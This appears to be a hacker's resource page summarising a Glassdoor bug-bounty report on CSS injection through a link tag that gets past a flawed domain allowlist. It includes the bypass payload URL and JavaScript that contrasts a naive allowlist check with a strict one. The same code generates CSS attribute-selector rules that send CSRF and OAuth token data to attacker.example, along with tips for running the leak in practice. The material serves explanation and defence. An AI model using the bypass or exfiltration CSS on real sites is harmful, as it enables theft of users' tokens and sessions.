Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

CSS injection via link tag whitelisted-domain bypass - 697

zonduu - GlassDoor - Posted 4 years ago
  • Glassdoor pages can load a stylesheet whose URL is taken from a URL parameter and written into a link tag. The parameter is checked against a domain allowlist so that you cannot point it at your own CSS.
  • The allowlist check is flawed, though. Supplying https://zonduu.me/example.css?http://www.glassdoor.com/ as the parameter gets past it and the attacker's stylesheet is injected into the page via the link tag: the allowed domain appears in the query string rather than in the host, which is exactly what a substring match over the whole URL accepts. To me, this looks like an issue with a regex or a case of in or contains being used improperly.
  • What can you do with arbitrary CSS loaded into the page? In old versions of Internet Explorer, CSS expression() evaluates script, so it gives XSS outright. In any browser, attribute selectors can read values out of the page's markup: a rule like input[name=csrf][value^="a"] only matches when the hidden token starts with that character, and giving each such rule a background-image on an attacker host leaks the value one character per round. The same trick with a[href*="..."] selectors can find sensitive data in URL query strings on the page, such as OAuth tokens.
  • The report was initially rated medium but was downgraded to low, with the service team saying it did not have much impact. To me, being able to exfiltrate data from a page should be of higher severity, but I'm unsure how to practically do this with CSS alone.
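The two points above (the substring-style allowlist check that the report's payload gets past, and what attacker CSS can then do) worked through as an added example. This is my own illustration, not code from the report or from Glassdoor; the allowlist entries, the hidden input named "csrf", the hex token alphabet and the host attacker.example are all assumptions.

```javascript
// Added example (not from the report or Glassdoor's code). Part 1 contrasts a
// substring-style allowlist check with a hostname-based one; part 2 generates
// the CSS attribute-selector exfiltration described in the notes. The allowlist
// entries, the input name "csrf" and the host attacker.example are assumptions.
const ALLOWED_HOSTS = ['www.glassdoor.com', 'static.glassdoor.com'];

// Vulnerable: passes if an allowed domain appears ANYWHERE in the URL string,
// so https://zonduu.me/example.css?http://www.glassdoor.com/ is accepted.
function isAllowedNaive(cssUrl) {
  return ALLOWED_HOSTS.some((host) => cssUrl.includes(host));
}

// Hardened: parse the URL, require https, and compare the hostname exactly.
// Unparseable input, userinfo tricks (https://www.glassdoor.com@zonduu.me/)
// and suffix tricks (www.glassdoor.com.zonduu.me) are all rejected here.
function isAllowedStrict(cssUrl) {
  let parsed;
  try {
    parsed = new URL(cssUrl);
  } catch (e) {
    return false;
  }
  if (parsed.protocol !== 'https:') return false;
  return ALLOWED_HOSTS.includes(parsed.hostname.toLowerCase());
}

// Part 2: once attacker CSS is in the page, attribute-substring selectors can
// leak attribute values. Each rule matches only if the hidden token starts
// with a given prefix, and a matching rule fires a background-image request
// whose path carries that prefix to the attacker. One stylesheet load leaks
// one character; the next load extends the known prefix.
const CHARSET = '0123456789abcdef'; // assumes a hex token

function exfilCss(knownPrefix, attackerHost = 'attacker.example') {
  return CHARSET.split('')
    .map((c) => {
      const guess = knownPrefix + c;
      return `input[name="csrf"][value^="${guess}"]{background:url(https://${attackerHost}/leak/${guess})}`;
    })
    .join('\n');
}

// Same idea aimed at URL query strings: any link on the page whose href
// carries an OAuth access token makes the browser fetch the attacker URL.
function urlTokenProbeCss(attackerHost = 'attacker.example') {
  return `a[href*="access_token="]{background:url(https://${attackerHost}/has-token)}`;
}

// Stand-in for the browser: for each round, find the rule whose selector
// matches the token (attribute ^= means "starts with") and read the leaked
// prefix back out of the request URL, exactly as the attacker's server would.
function simulateLeak(token) {
  let prefix = '';
  while (prefix.length < token.length) {
    const hit = exfilCss(prefix).split('\n').find((rule) => {
      const guess = rule.match(/\[value\^="([^"]*)"\]/)[1];
      return token.startsWith(guess);
    });
    if (!hit) break; // character outside CHARSET: no rule matches, leak stops
    prefix = hit.match(/\/leak\/([^)]*)\)/)[1];
  }
  return prefix;
}

// Walk-through of the report's payload and the simulated exfiltration.
function main() {
  const payload = 'https://zonduu.me/example.css?http://www.glassdoor.com/';
  console.log('naive :', isAllowedNaive(payload));   // true  (bypassed)
  console.log('strict:', isAllowedStrict(payload));  // false (rejected)
  console.log(exfilCss('3f'));
  console.log(urlTokenProbeCss());
  console.log('leaked token:', simulateLeak('3fa9c0'));
}

main();
```

Two practical caveats. The [value^=...] selector matches the attribute as it was served in the HTML, so this works on tokens sitting in hidden inputs, not on values typed in later; and each stylesheet load leaks a single character, so a real attack drives the rounds by reloading the injected stylesheet (or chaining @import) with the prefix learned so far. The expression() route is Internet Explorer only.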